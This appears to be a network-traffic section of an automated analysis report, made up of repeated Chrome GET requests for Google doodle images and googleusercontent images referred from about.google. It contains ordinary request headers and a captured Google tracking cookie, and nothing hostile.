    Source: global trafficHTTP traffic detected: GET /bT4TRpcZTcPqGbDgGXBdUty2CyQ_sJtQ4s-64-SRkkZw3fObWd8EpEyxljydj79TDBZZD3Q_lHXDkxbdQWx443udWcpnpzexSkSxGD42GA=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/tunisia-national-day-2019-5078217890201600.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/spring-equinox-2019-northern-hemisphere-5139135894388736-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /gG7E-il42mOcA4BFm8CCSre-bGncM7LG4CEC6qvhoFog6buhLTlixRBjgofIsPFO-hFkn1eDmmP6qlWpNHeO9qv5dVmqbjF6Up6oLV_I=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /yUfZC3C2Zy7jpvG0VIa0JY6deVELiJXaXOPx18ZYtHvHJDBKOhGLc9S0e2bXc3t8OdDyMbr6at7dqFWUzUspazqgpKlmdO3_YQHGmqPT=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2019/fall-equinox-2019-southern-hemisphere-5334567442448384-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /S2YXjtSfM-nTFgL7NVN1Tq5pWVcOPb0tjeG_BzjraNGRtkr-HFaSBG4OpePt7naldeQvWoExSs2K-JmFB5ttVh-fiS-KPuRf40fojUof=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/spring-equinox-2018-5263345362927616-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/tunisia-national-day-6461049875202048.4-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /FhIwYfdhqW6ygU9DnZnr2VCxVaIU6sivlBaa91wIuTB7cox40KZfT2EnyKjdCyute5w1ewVzc3N3G3DWFVngy0kFy2YC9JU7WlwUFmtj=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /R3qBk5xW_52Z6Rit39SW--TTlXpogLb7RCor5-tdRx7X6ykqM_0Lh0Rji5M6Oz1FLG8Paqh4aRabiP3JrlFPGal5R1P8MGlohZ0-753zbQ=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e7gO_KgBDTqqeWioKwa3ZWaK155IbBsnaB0n89ZTR4RBmvRPnOhBXOKOi_nBeT3OvcVxRXHcoFTY6g2i_ONX3uvB2SjFIM80LewujfCV=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3l4wROvUwcnbW_GsR0BdH1f--Wd9SIagmwpo9_C-5xUynH6zITpBwx_acG3e0TUNpmfEOsRneH-q-E3CmnVfjxKlnN3JdeI2rCQT4JI=s660 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/fall-equinox-2018-6545460612300800.2-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2018/usmar-ismails-97th-birthday-6322954328604672-2x.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2017/first-day-of-spring-2017-northern-hemisphere-5171021979058176-2xa.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2017/first-day-of-fall-2017-southern-hemisphere-5673416651702272-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/icc-sri-lanka-v-west-indies-4888550698909696-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/tunisia-national-day-2016-5102192186884096-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/first-day-of-fall-2016-southern-hemisphere-5703954739494912-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2016/first-day-of-spring-2016-northern-hemisphere-5727786629070848-hp2x.gif HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2015/cricket-world-cup-2015-quarterfinals-3-australia-vs-pakistan-5655610641088512-hp.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/tunisia-independance-day-5364643732127744-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/first-day-of-spring-2014-5086324449083392-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
    Source: global trafficHTTP traffic detected: GET /logos/doodles/2014/first-day-of-fall-2014-6370654056087552-hp2x.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=n-CJFiNWazk4y61JdZjHtSyPElN0_FX0e-b6OCaitI74PQnDIKjmqWE0MwN6Ybp_wL7GI7eptWR8c0-ndvaDqzkL637ynOoxs6UtyXSzHzdnVLbodceIYDMy9RW2fmAkVoebaoDTq3beLqcBO9QHpCpznj7JxZjInqY_hWE56k4
